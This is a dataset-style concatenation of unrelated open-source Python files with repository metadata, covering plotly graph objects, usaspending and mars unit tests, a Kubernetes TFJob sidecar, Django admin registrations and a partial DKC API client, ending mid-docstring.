] | 11,750 | 2015-10-12T07:03:39.000Z | 2022-03-31T20:43:15.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,951 | 2015-10-12T00:41:25.000Z | 2022-03-31T22:19:26.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,623 | 2015-10-15T14:40:27.000Z | 2022-03-28T16:05:50.000Z | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scattergl.selected"
_path_str = "scattergl.selected.textfont"
_valid_props = {"color"}
# color
# -----
@property
def color(self):
"""
Sets the text font color of selected points.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the text font color of selected points.
"""
def __init__(self, arg=None, color=None, **kwargs):
"""
Construct a new Textfont object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.scattergl.selected.Textfont`
color
Sets the text font color of selected points.
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scattergl.selected.Textfont
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scattergl.selected.Textfont`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 36.294964 | 82 | 0.557185 |
71de53558c42e2ff9effe10bcb500ec533beb54c | 10,487 | py | Python | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | [
"CC0-1.0"
] | null | null | null | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | [
"CC0-1.0"
] | 1 | 2021-11-15T17:54:12.000Z | 2021-11-15T17:54:12.000Z | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | [
"CC0-1.0"
] | null | null | null | # Stdlib imports
# Core Django imports
from django.core.management import call_command
# Third-party app imports
import pytest
from unittest.mock import MagicMock
from model_mommy import mommy
# Imports from your apps
from usaspending_api.awards.models import Award, Subaward, TransactionNormalized
from usaspending_api.references.models import Agency, SubtierAgency
from usaspending_api.recipient.models import RecipientLookup
DB_CURSOR_PARAMS = {
'default': MagicMock(),
'data_broker': MagicMock(),
'data_broker_data_file': 'usaspending_api/broker/tests/data/broker_subawards.json'
}
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_no_associated_awards(mock_db_cursor):
"""
Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to
"""
mommy.make(RecipientLookup, duns='PARENTDUNS54321', legal_business_name='WIZARD SCHOOLS')
call_command('load_fsrs')
expected_results = {
'count': 3,
'awards': [None, None, None],
'recipient_names': ["JJ'S DINER", 'HARRY POTTER', 'HARRY POTTER'],
'ppop_city_names': ['PAWNEE', '', ''],
'subaward_descs': ['RANDOM DESCRIPTION TEXT', 'HOGWARTS ACCEPTANCE LETTER',
'HOGWARTS ACCEPTANCE LETTER REVISED'],
'duns': ['DUNS12345', 'DUNS54321', 'DUNS54321'],
'dba_names': ["JJ'S", "HOGWARTS", "HOGWARTS"],
'parent_recipient_names': ["PARENT JJ'S DINER", "WIZARD SCHOOLS", "WIZARD SCHOOLS"],
'broker_award_ids': [10, 20, 30],
'internal_ids': ['PROCUREMENT_INTERNAL_ID', 'GRANT_INTERNAL_ID_1', 'GRANT_INTERNAL_ID_2'],
}
actual_results = {
'count': Subaward.objects.count(),
'awards': list(Subaward.objects.values_list('award', flat=True)),
'recipient_names': list(Subaward.objects.values_list('recipient_name', flat=True)),
'ppop_city_names': list(Subaward.objects.values_list('pop_city_name', flat=True)),
'subaward_descs': list(Subaward.objects.values_list('description', flat=True)),
'duns': list(Subaward.objects.values_list('recipient_unique_id', flat=True)),
'dba_names': list(Subaward.objects.values_list('dba_name', flat=True)),
'parent_recipient_names': list(Subaward.objects.values_list('parent_recipient_name', flat=True)),
'broker_award_ids': list(Subaward.objects.values_list('broker_award_id', flat=True)),
'internal_ids': list(Subaward.objects.values_list('internal_id', flat=True)),
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_exact_match(mock_db_cursor):
"""
Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN54321',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 100, 100]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_with_dashes(mock_db_cursor):
"""
Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN-54321',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 100, 100]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_multiple_matching_fains(mock_db_cursor):
"""
Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-02',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN-54321',
'date_signed': '1700-01-01',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 99, 99]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_subaward_update(mock_db_cursor):
"""
Test the subaward load as if a subaward is already in there with the same internal id, delete/update it
"""
models_to_mock = [
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-03',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
},
{
'id': 5,
'model': Subaward,
'subaward_number': 'SUBNUM54322',
'internal_id': 'GRANT_INTERNAL_ID_1',
'broker_award_id': 1,
'award_type': 'grant',
'award_id': 99,
'amount': 2,
'action_date': '2014-01-01'
},
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'subaward_number': 'SUBNUM54321',
'amount': 54321,
'action_date': '1212-12-12'
}
actual_results = Subaward.objects.filter(internal_id='GRANT_INTERNAL_ID_1').values(*expected_results)[0]
actual_results['action_date'] = str(actual_results['action_date'])
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_subaward_broken_links(mock_db_cursor):
"""
Test the subaward load as if a subaward has been loaded w/o a parent award and now the parent award is available
"""
models_to_mock = [
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-03',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
},
{
'id': 5,
'model': Subaward,
'subaward_number': 'SUBNUM54322',
'internal_id': 'GRANT_INTERNAL_ID_1',
'broker_award_id': 100,
'award_type': 'grant',
'award_id': None,
'amount': 2,
'action_date': '2014-01-01'
},
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'award_id': 99,
}
actual_results = Subaward.objects.filter(id=5).values(*expected_results)[0]
assert expected_results == actual_results
| 31.778788 | 116 | 0.610089 |
ba66a14c1c6f88c6164494a5ee094ce9e5a478f6 | 3,115 | py | Python | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | [
"Apache-2.0"
] | null | null | null | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | [
"Apache-2.0"
] | 14 | 2020-09-26T01:27:23.000Z | 2022-02-10T02:14:54.000Z | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging as log
from os import getenv
from sys import exit
from time import sleep
from kubernetes import client, config
from kubernetes.client import V1Pod, V1ObjectMeta
JOB_SUCCESS_CONDITION = "Succeeded"
LOGGING_LEVEL_MAPPING = {"DEBUG": log.DEBUG, "INFO": log.INFO, "WARNING": log.WARNING, "ERROR": log.ERROR,
"CRITICAL": log.CRITICAL}
logging_level_str = getenv("LOGGING_LEVEL")
if logging_level_str is None:
raise RuntimeError("LOGGING_LEVEL env var is not defined!")
if logging_level_str not in LOGGING_LEVEL_MAPPING.keys():
raise RuntimeError("LOGGING_LEVEL env var must be set to one out of {}. Current value: {}"
.format(LOGGING_LEVEL_MAPPING.keys(), logging_level_str))
log.basicConfig(level=logging_level_str)
log.critical("Ps sidecar log level set to: " + logging_level_str)
config.load_incluster_config()
my_pod_name = getenv("MY_POD_NAME")
if my_pod_name is None:
raise RuntimeError("MY_POD_NAME env var is not defined!")
with open("/var/run/secrets/kubernetes.io/serviceaccount/namespace", mode='r') as file:
my_current_namespace = file.read()
if not my_current_namespace:
raise RuntimeError(f"error reading my current namespace {str(my_current_namespace)}")
v1 = client.CoreV1Api()
my_pod: V1Pod = v1.read_namespaced_pod(name=my_pod_name, namespace=my_current_namespace)
my_pod_metadata: V1ObjectMeta = my_pod.metadata
try:
my_tfjob_name = my_pod_metadata.owner_references[0].name
except IndexError:
raise RuntimeError("couldn't read my pod tf_job_key - no owner reference!")
if my_tfjob_name is None or my_tfjob_name == "":
raise RuntimeError("my_tfjob_name is not defined!")
coAPI = client.CustomObjectsApi()
log.info("initialization succeeded")
while True:
log.info(f"fetching tfjob: {my_tfjob_name} ...")
my_tfjob = coAPI.get_namespaced_custom_object(group="kubeflow.org",
version="v1alpha2",
namespace=my_current_namespace,
plural="tfjobs",
name=my_tfjob_name)
job_conditions = my_tfjob["status"]["conditions"]
for condition in job_conditions:
if condition.get("type") == JOB_SUCCESS_CONDITION:
log.info("Job succeeded, creating END hook")
open("/pod-data/END", 'a').close()
log.info("exiting...")
exit(0)
sleep(1)
| 33.138298 | 106 | 0.686998 |
a690c38c0d2fac4fa6dff75ea8eb73b1adb90108 | 155 | py | Python | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2018-12-29T09:53:39.000Z | 2018-12-29T09:53:42.000Z | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | import binascii
import datetime
import <error descr="No module named nonexistent">nonexistent</error>
print(binascii)
print(datetime)
print(nonexistent)
| 17.222222 | 69 | 0.812903 |
842258234e0190fd4f026476b288e6d41f383ed1 | 239 | py | Python | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | [
"MIT"
] | 57 | 2019-12-08T00:02:14.000Z | 2022-03-24T20:40:40.000Z | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | [
"MIT"
] | 3 | 2020-01-26T03:38:31.000Z | 2020-06-21T13:42:46.000Z | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | [
"MIT"
] | 8 | 2020-04-20T08:17:57.000Z | 2021-10-04T06:04:51.000Z | from ptrlib.util.encoding import *
from ptrlib.util.packing import *
from ptrlib.util.logic import *
from ptrlib.util.construct import *
from ptrlib.util.opebinary import *
from ptrlib.util.misc import *
from ptrlib.util.brutepwn import *
| 29.875 | 35 | 0.794979 |
77a84e501386cfba40c2c4443f895194e2e3f5ea | 6,725 | py | Python | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | [
"Apache-2.0"
] | 2 | 2019-03-29T04:11:10.000Z | 2020-07-08T10:19:54.000Z | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | [
"Apache-2.0"
] | null | null | null | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from mars.tensor.random import RandomState, beta, rand, choice, multivariate_normal, \
randint, randn, permutation, TensorPermutation, shuffle
from mars.tensor.datasource import tensor as from_ndarray
from mars.tests.core import TestBase
from mars.tiles import get_tiled
class Test(TestBase):
def testRandomSerialize(self):
arr = RandomState(0).beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2),
chunk_size=1, size=(3, 2, 2)).tiles()
chunk = arr.chunks[0]
self.assertEqual(chunk.op.dtype, np.dtype('f8'))
serials = self._pb_serial(chunk)
chunk2 = self._pb_deserial(serials)[chunk.data]
self.assertEqual(chunk.index, chunk2.index)
self.assertEqual(chunk.op.state, chunk2.op.state)
self.assertEqual(chunk.op.seed, chunk2.op.seed)
def testRandom(self):
arr = rand(2, 3)
self.assertIsNotNone(arr.dtype)
arr = beta(1, 2, chunk_size=2).tiles()
self.assertEqual(arr.shape, ())
self.assertEqual(len(arr.chunks), 1)
self.assertEqual(arr.chunks[0].shape, ())
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
arr = beta([1, 2], [3, 4], chunk_size=2).tiles()
self.assertEqual(arr.shape, (2,))
self.assertEqual(len(arr.chunks), 1)
self.assertEqual(arr.chunks[0].shape, (2,))
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
arr = beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2),
chunk_size=1, size=(3, 2, 2)).tiles()
self.assertEqual(arr.shape, (3, 2, 2))
self.assertEqual(len(arr.chunks), 12)
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
def testChoice(self):
t = choice(5, chunk_size=1)
self.assertEqual(t.shape, ())
t = t.tiles()
self.assertEqual(t.nsplits, ())
self.assertEqual(len(t.chunks), 1)
t = choice(5, 3, chunk_size=1)
self.assertEqual(t.shape, (3,))
t = t.tiles()
self.assertEqual(t.nsplits, ((1, 1, 1),))
t = choice(5, 3, replace=False)
self.assertEqual(t.shape, (3,))
with self.assertRaises(ValueError):
choice(-1)
# a should be 1-d
with self.assertRaises(ValueError):
choice(np.random.rand(2, 2))
# p sum != 1
with self.assertRaises(ValueError):
choice(np.random.rand(3), p=[0.2, 0.2, 0.2])
# p should b 1-d
with self.assertRaises(ValueError):
choice(np.random.rand(3), p=[[0.2, 0.6, 0.2]])
# replace=False, choice size cannot be greater than a.size
with self.assertRaises(ValueError):
choice(np.random.rand(10), 11, replace=False)
# replace=False, choice size cannot be greater than a.size
with self.assertRaises(ValueError):
choice(np.random.rand(10), (3, 4), replace=False)
def testMultivariateNormal(self):
mean = [0, 0]
cov = [[1, 0], [0, 100]]
t = multivariate_normal(mean, cov, 5000, chunk_size=500)
self.assertEqual(t.shape, (5000, 2))
self.assertEqual(t.op.size, (5000,))
t = t.tiles()
self.assertEqual(t.nsplits, ((500,) * 10, (2,)))
self.assertEqual(len(t.chunks), 10)
c = t.chunks[0]
self.assertEqual(c.shape, (500, 2))
self.assertEqual(c.op.size, (500,))
def testRandint(self):
arr = randint(1, 2, size=(10, 9), dtype='f8', density=.01, chunk_size=2).tiles()
self.assertEqual(arr.shape, (10, 9))
self.assertEqual(len(arr.chunks), 25)
self.assertEqual(arr.chunks[0].shape, (2, 2))
self.assertEqual(arr.chunks[0].op.dtype, np.float64)
self.assertEqual(arr.chunks[0].op.low, 1)
self.assertEqual(arr.chunks[0].op.high, 2)
self.assertEqual(arr.chunks[0].op.density, .01)
def testUnexpectedKey(self):
with self.assertRaises(ValueError):
rand(10, 10, chunks=5)
with self.assertRaises(ValueError):
randn(10, 10, chunks=5)
def testPermutation(self):
x = permutation(10)
self.assertEqual(x.shape, (10,))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
self.assertEqual(len(x.chunks), 1)
self.assertIsInstance(x.chunks[0].op, TensorPermutation)
arr = from_ndarray([1, 4, 9, 12, 15], chunk_size=2)
x = permutation(arr)
self.assertEqual(x.shape, (5,))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
arr = get_tiled(arr)
self.assertEqual(len(x.chunks), 3)
self.assertTrue(np.isnan(x.chunks[0].shape[0]))
self.assertIs(x.chunks[0].inputs[0].inputs[0].inputs[0], arr.chunks[0].data)
arr = rand(3, 3, chunk_size=2)
x = permutation(arr)
self.assertEqual(x.shape, (3, 3))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
arr = get_tiled(arr)
self.assertEqual(len(x.chunks), 4)
self.assertTrue(np.isnan(x.chunks[0].shape[0]))
self.assertEqual(x.chunks[0].shape[1], 2)
self.assertIs(x.cix[0, 0].inputs[0].inputs[0].inputs[0], arr.cix[0, 0].data)
self.assertIs(x.cix[0, 0].inputs[0].inputs[1].inputs[0], arr.cix[1, 0].data)
self.assertEqual(x.cix[0, 0].op.seed, x.cix[0, 1].op.seed)
self.assertEqual(x.cix[0, 0].inputs[0].inputs[0].inputs[0].op.seed,
x.cix[1, 0].inputs[0].inputs[0].inputs[0].op.seed)
with self.assertRaises(np.AxisError):
self.assertRaises(permutation('abc'))
def testShuffle(self):
with self.assertRaises(TypeError):
shuffle('abc')
x = rand(10, 10, chunk_size=2)
shuffle(x)
self.assertIsInstance(x.op, TensorPermutation)
x = rand(10, 10, chunk_size=2)
shuffle(x, axis=1)
self.assertIsInstance(x.op, TensorPermutation)
self.assertEqual(x.op.axis, 1)
| 34.487179 | 89 | 0.603866 |
68fd0f32abe61ac99f1b2bfc403791712c028f2b | 1,300 | py | Python | files/admin.py | springborland/bk-sops | a9057672c10efb5f2414a805a30ead4092429c76 | [
"Apache-2.0"
] | 1 | 2021-05-19T04:31:34.000Z | 2021-05-19T04:31:34.000Z | files/admin.py | ZhuoZhuoCrayon/bk-sops | d1475d53c19729915727ce7adc24e3226f15e332 | [
"Apache-2.0"
] | null | null | null | files/admin.py | ZhuoZhuoCrayon/bk-sops | d1475d53c19729915727ce7adc24e3226f15e332 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.contrib import admin
from files import models
@admin.register(models.UploadModuleFileTag)
class UploadModuleFileTagAdmin(admin.ModelAdmin):
list_display = ["id", "source_ip", "file_name", "file_path"]
search_fields = ["id", "source_ip", "file_name", "file_path"]
@admin.register(models.UploadTicket)
class UploadTicketAdmin(admin.ModelAdmin):
list_display = ["id", "code", "applicant", "apply_from", "created_at", "is_available", "used_at"]
search_fields = ["id", "code", "applicant", "apply_from"]
list_filter = ["is_available"]
| 43.333333 | 115 | 0.758462 |
a0879e316536ea873328ca91a906c869dc356bda | 11,521 | py | Python | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | [
"MIT"
] | 1 | 2022-03-09T06:09:59.000Z | 2022-03-09T06:09:59.000Z | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | [
"MIT"
] | null | null | null | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | [
"MIT"
] | null | null | null | from __future__ import annotations
from typing import Union
from dkc_api.v1.const import URL_DOMAIN
from dkc_api.v1.models.error import ResponceError, ResponceErrorAlternative
from dkc_api.v1.exceptions.exceptions import NotValidVariables
from .models import GetRevisionLastSize, GetRevisionLast, GetRevisionDrawings, GetRevisionCertificates, GetRevisionMaterials, \
GetFile, PostFile, PostFileContent
import loguru
import requests
import datetime
from pydantic.error_wrappers import ValidationError
class Content:
""" Class for interacting with available operations for working with site news """
def __init__(self, access_token: str, headers: dict, debug: bool=False, logger: loguru.Logger = loguru.logger):
""" Class for interacting with available operations for working with site news """
self.access_token = access_token
self.headers = headers
self.logger = logger
self.debug = debug
def getRevisionsLastSize(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLastSize, ResponceError]:
""" Get data about the size of the update in bytes. If 0 - there are no updates hour.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionLastSize, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.getRevisionsLastSize()
> getRevisionsLastSize({"size": 67602981, "forced_update": false})
>>> dkc_api.Content.getRevisionsLastSize(last_updated=datetime.datetime.now())
> getRevisionsLastSize({"size": 0, "forced_update": false})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/last/size?{send_last_updated}", headers=self.headers)
try: return GetRevisionLastSize(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionsLast(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLast, ResponceError]:
""" An array containing a complete data upload or delta of changes, if the last_updated parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionLast, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.GetRevisionLast()
> GetRevisionLast(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/last?{send_last_updated}", headers=self.headers)
try: return GetRevisionLast(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionDrawings(self, last_updated: datetime.datetime=None) -> Union[GetRevisionDrawings, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
